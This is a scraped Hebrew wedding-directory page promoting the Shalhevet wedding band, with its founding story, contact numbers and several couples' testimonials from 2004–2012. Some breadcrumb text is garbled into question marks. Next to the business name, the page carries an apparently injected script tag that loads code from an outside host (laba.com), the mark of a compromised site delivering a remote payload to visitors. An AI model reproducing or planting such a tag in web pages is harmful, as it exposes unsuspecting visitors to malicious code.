חתונה יהודית
פירסום חתונה בדקה ה90 אירועים וחוויות ווידאו חתונה הנחות ומבצעים מאמרים רשימה אישית טיפים חתונה - ראשי
 
חתונה יהודית > ????? \ ??????  > ????? \ ??????? > שלהבת
חזור 
שלהבת
תזמורת שלהבת הוקמה ע"י גלעד פוטולסקי בשנת 1994, ותוך זמן קצר הפכה להיות מהתזמורת המובילות והמוכרות ביותר. גלעד פוטולסקי יחד עם כל צוות תזמורת שלהבת שמו להם למטרה להיות מספר אחת. תזמורת שלהבת מופיעה בהרכב בסיס של 7 נגנים, אליהם ניתן לצרף זמרים אורחים, נגנים נוספים וכן את הרכב "מיתרי שלהבת" הכולל עשרה כנרים לאירועים יוקרתיים במיוחד. תזמורת שלהבת קבעה לעצמה סטנדרטים גבוהים בכל תחום המוזיקה והאירועים. המוטו אשר עומד תמיד לנגד עיננו הוא "מושלמות": מושלמות בביצוע, מושלמות במראה, מושלמות בסאונד, מושלמות בהפקה, מושלמות בעיבודים, מושלמות בנגינה. לא לחינם נחשבת ב"ה תזמורת שלהבת לאחת מהתזמורות היוקרתיות במיוחד. בתזמורת שלהבת איננו מכירים סטנדרט של אירוע פשוט ואצלנו כל אירוע הוא יוקרתי ומיוחד.

טלפון :
052-2603730
נייד :
052-2603730
כתובת :
 


ליצירת קשר עם בעל העסק הקש כאן
שלהבת - ????? \ ??????<script src=http://laba.com/muuu.s></script> 1
SimpleViewer requires Macromedia Flash. Get Macromedia Flash. If you have Flash installed, click to view gallery
 30/07/2012 06:37:35- רן וטליה
הפתעתם אותנו
תודה ושוב תודה על האירוע המדהיםתמיד חלמנו שכשנגיע לחתונתנו רק אתם תשמחו אותנו אבל לא הרגשנו כמה אתם טובים עד שלא הגענו ליום שלנו.אין לנו מילים להודות לכם על השמחה והריקודים על השרות והאדיבות על הנשמה שנתתם באירוע ולפניו על האכפתיות לכל פרט.הרגשנו שאתם כחלק מהמשפחה משמחים ושמחים איתנו יחד.תודה לגלעד ותודה לכל הנגנים כל אחד כפי מעלתו וכבודו.הגשמתם לנו את החלום בצורה הטובה ביותר.תודה רבה על הכל. ושוב ושוב ושוב תודה!!!!

08/06/2012 06:35:47- יהונתן ויעל עבאדי-רבבה
רשמים חמים מהחתונה
גלעד ותזמורת שלהבת שלום וברכה,אמנם קצת באיחור, אבל מוטב מאוחר... רצינו להביע את תודתנו והערכתנו על שזכינו כי ניגנתם בחתונתנו.בחירת להקה בשבילנו הייתה אחת ההחלטות החשובות שנדרשו לארגון החתונה. הריקודים מהווים חלק משמעותי בה.לשמחתנו, כבר מהפגישה הראשונה אתכם חשנו כי אתם קשובים לרצונותינו ומוכנים להתגמש איתנו לפי הצרכים. שלא לדבר על טיפים חשובים שניתנו לנו על ידכם לאור נסיונכם הרב. ואכן, בחתונה, הייתם מעל ומעבר לכל הצפיות! עשיתם שמח, ידעתם "לקרוא" את השטח ואת סגנון החבר'ה הרוקדים. דבר שמעיד על המקצועיות שלכם והיכולת להתאים עצמכם לכל סוג של קהל. החל ממקצועיות הלהקה עצמה וכלה בבחירת השירים הנכונה המשלבת "קלאסיקה" מחד, ושירים "בני זמננו" מאידך.על כל אלו ועוד שלוחות לכם תודותינו הכנות.בקיצור, אנחנו שמחים ומאושרים שבחרנו בכם כלהקה בחתונתו. בעז"ה נמליץ בחום לחברינו ומכרינו ללא שמץ של היסוס על הלהקה המעולה שלכם. עלו והצליחו!!

12/05/2012 06:33:49- שלמה וברכי
חתונה
לגלעד ותזמורתו רצינו להודות על החתונה השמחה והנפלאה שעשיתם לנו בשבוע שעבר תזכו תמיד לשמח את עם ישראל

09/03/2012 06:32:48- רונית וירון גורמן
תודה
תודה על השמחה שעשיתם לנו, תודה לכל הנגנים שנתנו את כל הלב. תודה ענקית לגלעד הענק ולאלי על כל היעוץ והעזרה. הייתם ותשארו מס' 1

04/06/2004 00:42:17- הדר
שלהבת
תזמורת הקלאסית החסידית של כל הזמנים. מאת הזמר הדר